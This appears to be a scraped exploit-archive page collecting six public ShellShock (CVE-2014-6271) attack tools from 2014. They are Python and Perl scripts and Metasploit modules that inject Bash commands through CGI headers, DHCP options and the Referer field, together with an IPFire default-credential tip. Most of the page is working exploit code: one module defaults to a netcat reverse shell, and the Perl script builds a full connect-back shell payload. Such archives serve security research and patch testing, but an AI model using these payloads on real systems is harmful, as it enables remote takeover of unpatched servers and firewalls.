#!/usr/bin/env python
#
# Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock)
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://www.ipfire.org
#
# Software Link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso
#
# Date : 2014-09-29
#
# Fixed version: IPFire 2.15 core 83 (2014-09-28)
#
# Info: IPFire is a free Linux distribution which acts as a router and firewall in the first instance.
#       It can be maintained via a web interface.
#       The distribution furthermore offers selected server-daemons and can easily be expanded to a SOHO-server.
#       IPFire is based on Linux From Scratch and is, like the Endian Firewall, originally a fork from IPCop.
#
# Vulnerability: IPFire <= 2.15 core 82 Cgi Web Interface suffers from Authenticated Bash Environment Variable Code Injection
#                (CVE-2014-6271)
#
# Suggestion:
#
# If you can't update the distro and you have installed ipfire via image files (Arm, Flash)
# make sure to change the default access permission to graphical user interface (user:admin pass:ipfire)
#
#
# http connection
import urllib2
# Basic Auth management Base64
import base64
# Args management
import optparse
# Error management
import sys
 
banner = """
       ___ _______ _______ __                _______       __
      |   |   _   |   _   |__.----.-----.   |   _   .-----|__|
      |.  |.  1   |.  1___|  |   _|  -__|   |.  1___|  _  |  |
      |.  |.  ____|.  __) |__|__| |_____|   |.  |___|___  |__|
      |:  |:  |   |:  |                     |:  1   |_____|
      |::.|::.|   |::.|                     |::.. . |
      `---`---'   `---'                     `-------'
   _______ __          __ __ _______ __               __
  |   _   |  |--.-----|  |  |   _   |  |--.-----.----|  |--.
  |   1___|     |  -__|  |  |   1___|     |  _  |  __|    <
  |____   |__|__|_____|__|__|____   |__|__|_____|____|__|__|
  |:  1   |                 |:  1   |
  |::.. . |                 |::.. . |
  `-------'                 `-------'
 
                                IPFire <= 2.15 c0re 82 Authenticated
                                Cgi Sh3llSh0ck r3m0t3 C0mm4nd Inj3ct10n
 
                          Written by:
 
                        Claudio Viviani
 
                     http://www.homelab.it
 
                        info@homelab.it
                    homelabit@protonmail.ch
 
               https://www.facebook.com/homelabit
                  https://twitter.com/homelabit
               https://plus.google.com/+HomelabIt1/
     https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
 
# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url
 
def connectionScan(url,user,pwd,cmd):
    print '[+] Connection in progress...'
    try:
        response = urllib2.Request(url)
        content = urllib2.urlopen(response)
        print '[X] IPFire Basic Authentication not found'
    except urllib2.HTTPError, e:
        if e.code == 404:
            print '[X] Page not found'
        elif e.code == 401:
            try:
                print '[+] Authentication in progress...'
                base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '')
                headers = {'VULN' : '() { :;}; echo "H0m3l4b1t"; /bin/bash -c "'+cmd+'"' }
                response = urllib2.Request(url, None, headers)
                response.add_header("Authorization", "Basic %s" % base64string)
                content = urllib2.urlopen(response).read()
                if "ipfire" in content:
                    print '[+] Username & Password: OK'
                    print '[+] Checking for vulnerability...'
                    if 'H0m3l4b1t' in  content:
                        print '[!] Command "'+cmd+'": INJECTED!'
                    else:
                        print '[X] Not Vulnerable :('
                else:
                     print '[X] No IPFire page found'
            except urllib2.HTTPError, e:
                if e.code == 401:
                   print '[X] Wrong username or password'
                else:
                   print '[X] HTTP Error: '+str(e.code)
            except urllib2.URLError:
                print '[X] Connection Error'
        else:
            print '[X] HTTP Error: '+str(e.code)
    except urllib2.URLError:
        print '[X] Connection Error'
 
commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "touch /tmp/test.txt"')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL",
                  )
commandList.add_option('-c', '--cmd', action="store",
                  help="Insert command name",
                  )
commandList.add_option('-u', '--user', action="store",
                  help="Insert username",
                  )
commandList.add_option('-p', '--pwd', action="store",
                  help="Insert password",
                  )
options, remainder = commandList.parse_args()
 
# Check args
if not options.target or not options.cmd or not options.user or not options.pwd:
    print(banner)
    commandList.print_help()
    sys.exit(1)
 
print(banner)
 
url = checkurl(options.target)
cmd = options.cmd
user = options.user
pwd = options.pwd
 
connectionScan(url,user,pwd,cmd)

(29)

29Sep/140

DHCP Client Bash Environment Variable Code Injection

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'rex/proto/dhcp'
 
class Metasploit3 < Msf::Auxiliary
 
  include Msf::Exploit::Remote::DHCPServer
 
  def initialize
    super(
      'Name'        => 'DHCP Client Bash Environment Variable Code Injection',
      'Description'    => %q{
        This module exploits a code injection in specially crafted environment
        variables in Bash, specifically targeting dhclient network configuration
        scripts through the HOSTNAME, DOMAINNAME, and URL DHCP options.
      },
      'Author'      =>
        [
          'scriptjunkie', 'apconole[at]yahoo.com', # Original DHCP Server auxiliary module
          'Stephane Chazelas', # Vulnerability discovery
          'Ramon de C Valle' # This module
        ],
      'License' => MSF_LICENSE,
      'Actions'     =>
        [
          [ 'Service' ]
        ],
      'PassiveActions' =>
        [
          'Service'
        ],
      'DefaultAction'  => 'Service',
      'References' => [
        ['CVE', '2014-6271'],
        ['CWE', '94'],
        ['URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/'],
        ['URL', 'http://seclists.org/oss-sec/2014/q3/649',],
        ['URL', 'https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/',]
      ],
      'DisclosureDate' => 'Sep 24 2014'
    )
 
    register_options(
      [
        OptString.new('SRVHOST',     [ true, 'The IP of the DHCP server' ]),
        OptString.new('NETMASK',     [ true, 'The netmask of the local subnet' ]),
        OptString.new('DHCPIPSTART', [ false, 'The first IP to give out' ]),
        OptString.new('DHCPIPEND',   [ false, 'The last IP to give out' ]),
        OptString.new('ROUTER',      [ false, 'The router IP address' ]),
        OptString.new('BROADCAST',   [ false, 'The broadcast address to send to' ]),
        OptString.new('DNSSERVER',   [ false, 'The DNS server IP address' ]),
        # OptString.new('HOSTNAME',    [ false, 'The optional hostname to assign' ]),
        OptString.new('HOSTSTART',   [ false, 'The optional host integer counter' ]),
        OptString.new('FILENAME',    [ false, 'The optional filename of a tftp boot server' ]),
        OptString.new('CMD',         [ true, 'The command to run', '/bin/nc -e /bin/sh 127.0.0.1 4444'])
      ], self.class)
  end
 
  def run
    value = "() { :; }; PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin #{datastore['CMD']}"
 
    # This loop is required because the current DHCP Server exits after the
    # first interaction.
    loop do
      begin
        start_service({
          'HOSTNAME' => value,
          'DOMAINNAME' => value,
          'URL' => value
        }.merge(datastore))
 
        while dhcp.thread.alive?
          select(nil, nil, nil, 2)
        end
 
      rescue Interrupt
        break
 
      ensure
        stop_service
      end
    end
  end
 
end

(49)

29Sep/140

Apache mod_cgi Bash Environment Variable Code Injection

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit4 < Msf::Exploit::Remote
  Rank = GoodRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
 
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Apache mod_cgi Bash Environment Variable Code Injection',
      'Description' => %q{
        This module exploits a code injection in specially crafted environment
        variables in Bash, specifically targeting Apache mod_cgi scripts through
        the HTTP_USER_AGENT variable.
      },
      'Author' => [
        'Stephane Chazelas', # Vulnerability discovery
        'wvu', # Original Metasploit aux module
        'juan vazquez' # Allow wvu's module to get native sessions
      ],
      'References' => [
        ['CVE', '2014-6271'],
        ['URL', 'https://access.redhat.com/articles/1200223'],
        ['URL', 'http://seclists.org/oss-sec/2014/q3/649']
      ],
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 2048
        },
      'Targets'        =>
        [
          [ 'Linux x86',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86,
              'CmdStagerFlavor' => [ :echo, :printf ]
            }
          ],
          [ 'Linux x86_64',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86_64,
              'CmdStagerFlavor' => [ :echo, :printf ]
            }
          ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Sep 24 2014',
      'License' => MSF_LICENSE
    ))
 
    register_options([
      OptString.new('TARGETURI', [true, 'Path to CGI script']),
      OptEnum.new('METHOD', [true, 'HTTP method to use', 'GET', ['GET', 'POST']]),
      OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]),
      OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']),
      OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
    ], self.class)
  end
 
  def check
    res = req("echo #{marker}")
 
    if res && res.body.include?(marker * 3)
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end
 
  def exploit
    # Cannot use generic/shell_reverse_tcp inside an elf
    # Checking before proceeds
    if generate_payload_exe.blank?
      fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
    end
 
    execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'], :nodelete => true)
 
    # A last chance after the cmdstager
    # Trying to make it generic
    unless session_created?
      req("#{stager_instance.instance_variable_get("@tempdir")}#{stager_instance.instance_variable_get("@var_elf")}")
    end
  end
 
  def execute_command(cmd, opts)
    cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
 
    req(cmd)
  end
 
  def req(cmd)
    send_request_cgi(
      {
        'method' => datastore['METHOD'],
        'uri' => normalize_uri(target_uri.path.to_s),
        'agent' => "() { :;};echo #{marker}$(#{cmd})#{marker}"
      }, datastore['TIMEOUT'])
  end
 
  def marker
    @marker ||= rand_text_alphanumeric(rand(42) + 1)
  end
end

(55)

29Sep/140

Gnu Bash 4.3 CGI Scan Remote Command Injection

#!/usr/bin/env python
 
# http connection
import urllib2
# Args management
import optparse
# Error managemen
import sys
 
banner = """
      _______                 _______             __
     |   _   .-----.--.--.   |   _   .---.-.-----|  |--.
     |.  |___|     |  |  |   |.  1   |  _  |__ --|     |
     |.  |   |__|__|_____|   |.  _   |___._|_____|__|__|
     |:  1   |               |:  1    \
     |::.. . |               |::.. .  /
     `-------'               `-------'
      ___ ___   _______     _______ _______ ___
     |   Y   | |   _   |   |   _   |   _   |   |
     |   |   |_|___|   |   |.  l   |.  1___|.  |
     |____   |___(__   |   |.  _   |.  |___|.  |
         |:  | |:  1   |   |:  |   |:  1   |:  |
         |::.| |::.. . |   |::.|:. |::.. . |::.|
         `---' `-------'   `--- ---`-------`---'
 
                              Gnu B4sh <= 4.3 Cg1 Sc4n + r3m0t3 C0mm4nd Inj3ct10n
 
          ==========================================
          - Release date: 2014-09-25
          - Discovered by: Stephane Chazelas
          - CVE: 2014-6271
          ===========================================
 
                        Written by:
 
                      Claudio Viviani
 
                   http://www.homelab.it
 
                      info@homelab.it
                  homelabit@protonmail.ch
 
             https://www.facebook.com/homelabit
                https://twitter.com/homelabit
             https://plus.google.com/+HomelabIt1/
   https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
 
# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url
 
def connectionScan(url):
    print '[+] Checking for vulnerability...'
    try:
        headers = {"VULN" : "() { :;}; echo 'H0m3l4b1t: YES'"}
        response = urllib2.Request(url, None, headers)
        content = urllib2.urlopen(response)
        if 'H0m3l4b1t' in  content.info():
            print '[!] VULNERABLE: '+url
        else:
            print '[X] NOT Vulnerable'
    except urllib2.HTTPError, e:
        print e.info()
        if e.code == 400:
            print '[X] Page not found'
        else:
            print '[X] HTTP Error'
    except urllib2.URLError:
        print '[X] Connection Error'
 
def connectionInje(url,cmd):
    try:
        headers = { 'User-Agent' : '() { :;}; /bin/bash -c "'+cmd+'"' }
        response = urllib2.Request(url, None, headers)
        content = urllib2.urlopen(response).read()
        print '[!] '+cmd+' command sent!'
    except urllib2.HTTPError, e:
        if e.code == 500:
            print '[!] '+cmd+' command sent!!!'
        else:
            print '[!] command not sent :('
    except urllib2.URLError:
        print '[X] Connection Error'
 
commandList = optparse.OptionParser('usage: %prog [-s] -t http://localhost/cgi-bin/test -c "touch /tmp/test.txt"')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('-c', '--cmd', action="store",
                  help="Insert command name",
                  )
commandList.add_option('-s', '--scan', default=False, action="store_true",
                  help="Scan Only",
                  )
options, remainder = commandList.parse_args()
 
# Check args
if not options.target:
    print(banner)
    commandList.print_help()
    sys.exit(1)
elif options.target and not options.cmd and not options.scan:
    print(banner)
    commandList.print_help()
    sys.exit(1)
 
print(banner)
 
url = checkurl(options.target)
cmd = options.cmd
if options.scan:
    print '[+] Scan Only Mode'
    connectionScan(url)
else:
    print '[+] Remote Command Innection Mode'
    connectionScan(url)
    connectionInje(url,cmd)

(41)

29Sep/140

bashedCgi Remote Command Execution

    require 'msf/core'
 
    class Metasploit3 < Msf::Auxiliary
 
        include Msf::Exploit::Remote::HttpClient
 
 
        def initialize(info = {})
            super(update_info(info,
                'Name'           => 'bashedCgi',
                'Description'    => %q{
                   Quick & dirty module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command. 
                },
                'Author'         => [ 'Stephane Chazelas' ], # vuln discovery 
     'Author'   => [ 'Shaun Colley <scolley at ioactive.com>' ], # metasploit module 
                'License'        => MSF_LICENSE,
    'References'     => [ 'CVE', '2014-6271' ],
                'Targets'        => 
        [
                [ 'cgi', {} ]
        ],
     'DefaultTarget'  => 0,
    'Payload'        =>
      {
                    'Space'      => 1024,
        'DisableNops' => true
      },
     'DefaultOptions' => { 'PAYLOAD' => 0 } 
            ))
 
            register_options(
                [
                    OptString.new('TARGETURI', [true, 'Absolute path of BASH-based CGI', '/']),
                    OptString.new('CMD', [true, 'Command to execute', '/usr/bin/touch /tmp/metasploit'])
    ], self.class)
        end
 
        def run 
            res = send_request_cgi({
                'method'   => 'GET',
                'uri'      => datastore['TARGETURI'],
                'agent'    => "() { :;}; " + datastore['CMD']
            })
 
            if res && res.code == 200
                print_good("Command sent - 200 received")
            else
                print_error("Command sent - non-200 reponse")
            end
        end
    end

(34)

26Sep/140

Gnu Bash 4.3 CGI REFERER Command Injection

#!/usr/bin/perl
#
# Title: Bash/cgi command execution exploit
# CVE: CVE-2014-6271
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Coded: 25 September 2014
# Published: 26 September 2014
# MorXploit Research
# http://www.MorXploit.com
#
# Description:
# Perl code to exploit CVE-2014-6271.  
# Injects a Perl connect back shell. 
#
# Download:
# http://www.morxploit.com/morxploits/morxbash.pl
#
# Requires LWP::UserAgent
# apt-get install libwww-perl
# yum install libwww-perl
# perl -MCPAN -e 'install Bundle::LWP'
# For SSL support:
# apt-get install liblwp-protocol-https-perl
# yum install perl-Crypt-SSLeay
#
# Tested on:
# Apache 2.4.7 / Ubuntu 14.04.1 LTS / Bash 4.3.11(1)-release (x86_64-pc-linux-gnu)
#
# Demo:
# perl morxbash.pl http://localhost cgi-bin/test.cgi 127.0.0.1 1111
#
# ===================================================
# --- Bash/cgi remote command execution exploit
# --- By: Simo Ben youssef <simo_at_morxploit_com>
# --- MorXploit Research www.MorXploit.com
# ===================================================
# [*] MorXploiting http://localhost/cgi-bin/test.cgi
# [+] Sent payload! Waiting for connect back shell ...
# [+] Et voila you are in!
#
# Linux MorXploit 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
# Author disclaimer:
# The information contained in this entire document is for educational, demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use or dammage. Use at your own risk.
#
 
use LWP::UserAgent;
use IO::Socket;
use strict;
 
sub banner {
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "===================================================\n";
print "--- Bash/cgi remote command execution exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "===================================================\n";
}
 
if (!defined ($ARGV[0] && $ARGV[1] && $ARGV[2] && $ARGV[3])) {
banner();
print "perl $0 <target> <cgi script path> <connectbackIP> <connectbackport>\n";
print "perl $0 http://localhost cgi-bin/test.cgi 127.0.0.1 31337\n";
exit;
}
 
my $host = $ARGV[0];
my $dir = $ARGV[1];
my $cbhost = $ARGV[2];
my $cbport = $ARGV[3];
my $other = "http://localhost:81";
$| = 1;
$SIG{CHLD} = 'IGNORE';
 
my $l_sock = IO::Socket::INET->new(
Proto => "tcp",
LocalPort => "$cbport",
Listen => 1,
LocalAddr => "0.0.0.0",
Reuse => 1,
) or die "[-] Could not listen on $cbport: $!\n";
 
sub randomagent {
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my $random = $array[rand @array];
return($random);
}
my $useragent = randomagent();
 
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent($useragent);
my $status = $ua->get("$host/$dir");
unless ($status->is_success) {
banner();
print "[-] Error: " . $status->status_line . "\n";
exit;
}
 
banner();
print "[*] MorXploiting $host/$dir\n";
 
my $payload = "() { :; }; /bin/bash -c \"perl -e '\\\$p=fork;exit,if(\\\$p); use Socket; use FileHandle; my \\\$system = \\\"/bin/sh\\\"; my \\\$host = \\\"$cbhost\\\"; my \\\$port = \\\"$cbport\\\";socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\\\"tcp\\\")); connect(SOCKET, sockaddr_in(\\\$port, inet_aton(\\\$host))); SOCKET->autoflush(); open(STDIN, \\\">&SOCKET\\\"); open(STDOUT,\\\">&SOCKET\\\"); open(STDERR,\\\">&SOCKET\\\"); print \\\"[+] Et voila you are in!\\\\n\\\\n\\\"; system(\\\"uname -a;id\\\"); system(\\\$system);'\"";
my $exploit = $ua->get("$host/$dir", Referer => "$payload");
print "[+] Sent payload! Waiting for connect back shell ...\n";
my $a_sock = $l_sock->accept();
$l_sock->shutdown(SHUT_RDWR);
copy_data_bidi($a_sock);
 
sub copy_data_bidi {
my ($socket) = @_;
my $child_pid = fork();
if (! $child_pid) {
close(STDIN);
copy_data_mono($socket, *STDOUT);
$socket->shutdown(SHUT_RD);
exit();
} else {
close(STDOUT);
copy_data_mono(*STDIN, $socket);
$socket->shutdown(SHUT_WR);
kill("TERM", $child_pid);
}
}
sub copy_data_mono {
my ($src, $dst) = @_;
my $buf;
while (my $read_len = sysread($src, $buf, 4096)) {
my $write_len = $read_len;
while ($write_len) {
my $written_len = syswrite($dst, $buf);
return unless $written_len;
$write_len -= $written_len;
}
}
}

(98)